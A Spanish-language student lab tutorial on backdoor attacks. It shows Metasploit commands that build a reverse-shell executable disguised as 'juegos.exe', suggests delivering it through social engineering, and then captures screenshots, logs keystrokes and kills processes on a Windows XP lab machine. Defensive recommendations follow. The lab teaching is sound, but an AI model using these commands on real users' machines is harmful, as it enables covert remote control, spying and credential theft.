Aclaración:

El Siguiente ataque tiene fines académicos, no nos responsabilizamos del uso que se le dé a ésta información. Nuestro propósito es dar a conocer esta técnica para que usted se proteja de ataques similares.

Ataque BackDoor (Puerta Trasera)

Introducción:

¿Qué es Backdoor (Puerta Trasera)?

Es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta.

  • El Ataque Backdoor consiste en que un atacante remoto logra acceso ilegal a la máquina de un usuario y, eventualmente, puede tomar el control completo de la misma. Con sus puertas abiertas de par en par, la máquina afectada es el lugar perfecto para la recolección de datos sensibles.

Características:

  • Son invisibles por el usuario.
  • Se ejecutan en modo silencioso al iniciar el sistema.
  • Pueden tener acceso total a las funciones del  host-víctima.
  • Difícil eliminarlos del sistema ya que se instalan en carpetas de sistema, registros o cualquier dirección.
  • Usa un programa blinder para configurar y disfrazar al servidor para que la víctima no lo detecte fácilmente.

¿Qué se puede hacer con ataque Backdoor?

  • Ejecutar aplicaciones (instalaciones de programas, anular procesos, etc.).
  • Modificar parámetros de configuración del sistema.
  • Extraer y enviar información (archivos, datos, etc.) al host-victima.
  • Substraer o cambiar los password o archivos de password.
  • Mostrar mensajes en la pantalla.
  • Manipular el hardware de la host-víctima.
  • Acceso total a las funciones de la PC.

Objetivos del Ataque Backdoor:

Eludir los procedimientos habituales de autenticación al conectarse a una computadora. Instalándose una puerta trasera para permitir un acceso remoto más fácil.

Lograr una gran cantidad de computadoras infectadas para disponer de ellos libremente hasta el punto de formas redes de Zombies.

Diagrama del Ataque:

Usamos como Víctima:

Windows Xp SP3:

IP 192.168.94.132  NM 2555.255.255.0

Backtrack 5:

IP 192.168.94.133  NM 2555.255.255.0

Alcance:

“Cualquier medio capaz de ampliar el alcance del hombre es lo suficientemente poderoso como para derrocar su mundo. Conseguir que la magia de ese medio trabaje para los fines de uno, antes que en contra de ellos, es alcanzar el conocimiento.”  por Alan Kay

Por medio de este ataque nos referimos a una forma “no oficial” de acceso a un sistema o a un programa.

Estos programas no se reproducen solos como los virus, sino que usualmente nos son enviados con el fin de tener acceso a nuestros equipos a través del correo electrónico, por lo que no son fáciles de detectar y por si solos no siempre causan daños ni efectos inmediatos por su sola presencia, por lo que pueden llegar a permanecer activos mucho tiempo sin que nos percatemos de ello.

Como todo en Internet se basa en la arquitectura cliente/servidor, sólo se necesita instalar un programa servidor en una máquina para poder controlarla a distancia desde otro equipo, si se cuenta con el cliente adecuado, ésta puede bien ser la computadora de un usuario descuidado o poco informado.

Glosario:

  • SUDO.- permite a los usuarios ejecutar programas con los privilegios de seguridad de otro usuario (normalmente el usuario root) de manera segura. Se instala por defecto en /usr/bin.
  • MSFPAYLOAD.- línea de comandos de Metasploit que se utiliza para generar y dar salida a todos los diversos tipos de shellcode que están disponibles en Metasploit.
  • MSFCONSOLE.- Es un intérprete de comandos para realizar las pruebas sus penetración.
  • EXPLOIT.- Es un programa que explota una o varias vulnerabilidades en un software dado, frecuentemente es utilizado para ganar acceso a un sistema y tener un nivel de control sobre él.
  • PAYLOAD.- Es un programa que acompaña a un exploit para realizar funciones especificas una vez el sistema objetivo es comprometido, la elección de un buen payload es una decisión muy importante a la hora de aprovechar y mantener el nivel de acceso obtenido a un sistema, principalmente por el hecho de que en muchos sistemas existen firewalls, Antivirus y sistemas de detección de intrusos que pueden dificultar la actividad de algunos payloads.
  • SCREENSHOT.- Para capturar los elementos vistos en el monitor u otro dispositivo de salida visual.
  • KEYSCAN_START.- Para capturar los elementos que la victima teclee.
  • KEYSCAN_DUMP.- Para mostrar los elementos que fueron capturados.

Tutorial:

1. Instalar BackTrack 5

2. Ingresar con Usuario: root y Contraseña: toor. Para poner en modo gráfico tipear el: start x

3. Abrir Terminal

4. Modificar la dirección IP de nuestra máquina con el siguiente comando: sudo nano etc/network/interfaces

5. Se debe setear de manera estática : auto eth0 inet static. Nuestra IP debe ser parecida a la de la máquina Victima.

6. Crear el archivo ejecutable en nuestro caso se llamará juegos.exe:

msfpayload Windows/meterpreter/reverse_tcp LHOST= 192.168.94.133 LPORT=4444 X > juegos.exe

Luego se nos indica que el archivo ha sido creado.

Y a continuación lo podemos visualizar en Places/Home Folder:

Nota: Este archivo ejecutable lo podemos hacer llegar a la víctima, mediante ingeniería social, u otros medios como dispositivos de almacenamiento.

7. Para ir a la consola de MetaExploit usar el siguiente comando: msfconsole

Con esto se cargarán todas las herramientas para el ataque.

8. Para poder ejecutar los archivos que hemos enviado usar: use exploit/multi/handler

9. Ahora para encontrar vulnerabilidades de los puertos de la victima escribir:

set PAYLOAD Windows/meterpreter/reverse_tcp

Y setear nuestra IP y PUERTO

10. Necesitamos saber si todo lo hecho está correcto para ello utilizamos el comando: show options

11. Usar el siguiente comando: exploit.

Debemos esperar hasta cuando la víctima haya ejecutado el archivo.

12. En este caso por motivos académicos lo pasamos vía USB y lo ejecutamos en nuestra máquina Víctima.

13. Una vez que la victima haya ejecutado nos indicará que una sesión ha sido iniciada:

Ahora que ya tenemos Acceso a nuestra Victima podemos realizar los ataques.

14. Para capturar la pantalla de la victima usamos: screenshot /img.jpg

15. Otro ataque es saber todo lo que la victima teclee, para ello utlizamos el comando: keyscan_start, para inicializarlo. Y keyscan_dump para ver todo lo tecleado.

La victima escribe, y nos aparecerá en el terminal.

16. También podemos ver todos los directorios que tiene nuestra victima con el comando: ls

Podemos crear carpetas en la máquina victima por ejemplo: mkdir (nombre_de_carpeta)

17. Podemos ver los procesos que tiene activos por ejemplo: en Windows Xp (nuestra víctima) abrimos Internet Explorer.

Luego en el terminal (BackTrack) con el comando ps –aux (para ver los procesos)

Y con el comando Kill y el número de proceso, le matamos el proceso, en este caso: kill 1272

18. Finalmente un último ataque reiniciamos la máquina de la víctima con el comando: reboot

A continuación el vídeo

Recomendaciones:

  • Tener siempre el software actualizado pues así se instalan los parches de seguridad del sistema.
  • Procura no usar claves con nombres obvios asociados a los usuarios, preferible usa contraseñas de alta seguridad para evitar los ataques de diccionario.
  • Usa estricta política de manejo y control de los usuarios en carpetas compartidas.
  • Utilizar cuentas de usuario con privilegios limitados
  • Procura no instalar programas de dudosa procedencia ya sean estás descargas de internet, correos y medios extraíbles.
  • Configurar las zonas de internet Explorer y el filtrado de URL.
  • Activa el firewall (Filtrado y protección de las comunicaciones).
  • Evitar ejecutar programas de los que no sepamos su procedencia, tanto en anexos de correo, ICQ, messanger y descargas de Internet (ya sean vía Web o FTP).

Conclusiones:

  • Como reflexión sobre este tipo de ataque es que debemos tomar ciertas medidas básicas para estar a salvo de las puertas traseras y el delicado riesgo para la seguridad que estas representan.
  • Al realizar nosotros este tipo de ataque logramos darnos cuenta como tan fácilmente las personas caen sin saber que esto les puede causar riesgos en su computadoras, el cual por medio de esta experiencia adquirida sabemos como estar alertas y protegidos sobre este ataque.

Integrantes:

  • Vicky Bravo Romero
  • Vicente Cabrera Martínez
  • Jhonatan Ortega Veloz
  • Xiomara Torres Ruíz
  • Darwin Vargas

Siguenos en Twitter:

@VickyBravoRo  @VicEmys  @JH_1805  @XiomyAndrea22  @7Vargas15